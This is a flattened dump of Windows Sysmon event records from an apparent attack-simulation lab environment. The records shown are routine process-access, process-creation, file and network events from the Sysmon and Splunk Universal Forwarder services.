11:24:19.916{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.916{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.916{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1963-6216-6507-000000003802}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.916{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1963-6216-6507-000000003802}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.918{C8EA50B7-1963-6216-6507-000000003802}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000298833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.869{C8EA50B7-1963-6216-6407-000000003802}64604992C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.509{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A83A53FA8BF4F05312E32DB94DEE3080,SHA256=7E32B1CDD26165BC65827E636A44F188BE869DAF7365D9FCE62634CCD772B7B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:16.644{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49567-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000222681Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:19.287{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35943B59974B225F96FA10CF1E5D5557,SHA256=C570C500C14779E2CA83C3301CF88A4CF1C77776DE6D01589F71AF615B5CEC43,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.255{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1963-6216-6407-000000003802}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.239{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.239{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.239{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.239{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.239{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1963-6216-6407-000000003802}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.239{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1963-6216-6407-000000003802}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:19.241{C8EA50B7-1963-6216-6407-000000003802}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000298851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:20.854{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1964-6216-6607-000000003802}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:20.853{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:20.853{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:20.852{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:20.852{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:20.852{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1964-6216-6607-000000003802}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:20.851{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1964-6216-6607-000000003802}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:20.850{C8EA50B7-1964-6216-6607-000000003802}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:20.517{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BD056DC878EDE67C5C704245399B967,SHA256=0AB970DCF968DF6853E47E53AA6807552A8C1FDF8BFDEECEF422C8209B69DA96,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222683Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:18.621{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51734-false10.0.1.12-8000- 23542300x8000000000000000222682Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:20.506{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AF0B5EC3E432C29C1B8446637382F9F,SHA256=62755921A4AE07AF386E4A6036E9F382E9953361511D5ACF4030BDCED6B31925,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:20.201{C8EA50B7-1963-6216-6507-000000003802}55004824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000222684Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:21.725{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A301F659F746EAF5A332967562FFA13C,SHA256=FC7FA0079D3CAA4A8A3D79B24136EF898563A3BDA1C5D24395B35EC3F2E342C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:21.556{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB08321DC4C4B3A2E849ABF6623BC8AE,SHA256=3064A5C31669B57E9DDF43CA4E614C35BE35A1A6C16A789722A9E264D22AB276,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:21.518{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1965-6216-6707-000000003802}4232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 